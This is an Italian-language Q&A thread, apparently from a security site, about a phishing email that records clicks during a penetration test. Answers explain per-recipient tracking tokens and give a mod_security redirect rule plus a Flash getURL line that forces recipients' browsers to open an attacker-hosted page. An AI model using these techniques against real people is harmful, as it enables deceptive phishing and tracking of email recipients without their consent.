Sto tentando di creare un'email di phishing per un progetto su cui sto lavorando. Nella mail voglio collegarmi a un sito che raccoglierà IP, browser, data / ora della visita. niente di malevolo, ma solo dimostrare che gli utenti hanno fatto clic sul collegamento. Posso farlo nel social engineering toolkit o non è possibile?
Il metodo più semplice consiste nel mettere un token utente personalizzato in ogni copia dell'email di phishing. Ad esempio, un mailing di Groupon nella mia casella di posta ha il seguente link: ho inserito una serie di nuove righe tra i singoli campi della stringa con codifica URL. Puoi vedere che c'è un campo "utente" con una stringa esadecimale da 64 byte - questo è l'identificatore univoco che dice a Groupon che sono io quando clicco sulla loro email per guardare l'offerta sul loro sito web.
http://www.groupon.com/deals/jimmy-s-famous-pizza-and-golfland-usa?
p=1
&utm_source=newsletter
&utm_medium=email
&sid=3cc714b9-fd5b-4d66-bead-e7c2e20d21bd
&division=boston
&user=03c1384e250d6c131d9b8948b6c5d536d26d9b0beb33f1fa5b6191e323b87c63
&date=20130522
Quindi quando clicco per andare al loro sito, sanno che sono lì perché hanno inviato una newsletter a (qualcuno) via email il 22 maggio. Assumono (qualcuno) sono io, a causa di quella stringa utente; naturalmente, se inoltro l'e-mail ai miei amici, e fanno clic, il sito Web otterrà quella stringa utente da loro ... quindi questa è solo una connessione allentata. Se stai effettuando il phishing, tuttavia, è davvero il più vicino possibile senza far sì che facciano di più che semplicemente fare clic su un link.
gowenfawr ha dato una risposta concisa, tuttavia, farò un ulteriore passo avanti. A seconda del client di posta elettronica che l'utente ha, è possibile costringerli a visitare un sito come se fosse o meno. Implica l'incorporamento di JPG o GIF, un server e mod_security.
Nell'istanza descritta sopra, potresti inserire " logo.jpg " nella tua firma. Se l'utente ha un'e-mail che consente la visualizzazione di contenuti remoti (html nell'e-mail), puoi dire a mod_security: "hey, ogni volta che qualcuno chiede logo.jpg, dai loro logo.swf " dove logo .swf esegue un getURL per aprire un browser.
SecFilterSelective REQUEST_URI "/logo.jpg" redirect:http://loaded-web-site.com/logo.swf
All'interno del file swf puoi inserire tutto ciò che vuoi:
getURL("social-engineering-toolkit-page.html", "_blank", "GET");
Tutto dipende da quanto tempo si vuole spendere, quanta fatica ci metti, ecc.
Leggi altre domande sui tag penetration-test phishing social-engineering